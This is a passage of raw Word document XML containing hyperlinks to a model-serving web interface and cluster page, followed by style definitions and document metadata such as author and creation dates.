        <w:instrText xml:space="preserve"> HYPERLINK "http://59.80.34.141:10000/ui/" \l "/launch_model/llm" \t "https://www.doubao.com/chat/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://59.80.34.141:10000/ui/#/launch_model/llm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://model.oneai.art/ui/" \l "/cluster_info" \t "https://www.doubao.com/chat/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>https://model.oneai.art/ui/#/cluster_info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600ACB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D8D33B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="54D8D3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6D"/>
    <w:rsid w:val="0000429B"/>
    <w:rsid w:val="0021421A"/>
    <w:rsid w:val="0025743A"/>
    <w:rsid w:val="00361F35"/>
    <w:rsid w:val="007A22FF"/>
    <w:rsid w:val="00813C18"/>
    <w:rsid w:val="00894647"/>
    <w:rsid w:val="008C44FB"/>
    <w:rsid w:val="00A35923"/>
    <w:rsid w:val="00AF5EE2"/>
    <w:rsid w:val="00D67297"/>
    <w:rsid w:val="00E0036D"/>
    <w:rsid w:val="00F3173E"/>
    <w:rsid w:val="00FF2FE9"/>
    <w:rsid w:val="108B6FE3"/>
    <w:rsid w:val="2F543722"/>
    <w:rsid w:val="395B2355"/>
    <w:rsid w:val="3BD866A3"/>
    <w:rsid w:val="3F472676"/>
    <w:rsid w:val="45921C25"/>
    <w:rsid w:val="4E985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HTML Code"/>
    <w:basedOn w:val="8"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="3"/>
    <w:qFormat/>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标题 1 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">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554</Words>
  <Characters>1621</Characters>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <TotalTime>131</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1930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2025-03-07T03:11:00Z</dcterms:created>
  <dc:creator>Zhongjie Yang</dc:creator>
  <cp:lastModifiedBy>杨忠杰</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-08T16:06:50Z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eyJoZGlkIjoiNjQ1MmMxMzc0OTNlMDRlZWM2NGUxNTQyY2VkYTk5NWQiLCJ1c2VySWQiOiI1MTY5Nzg0MjMifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.20305</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>4B7E5404D896451F830F9D9BFCB91B54_12</vt:lpwstr>
  </property>
</Properties>
</file>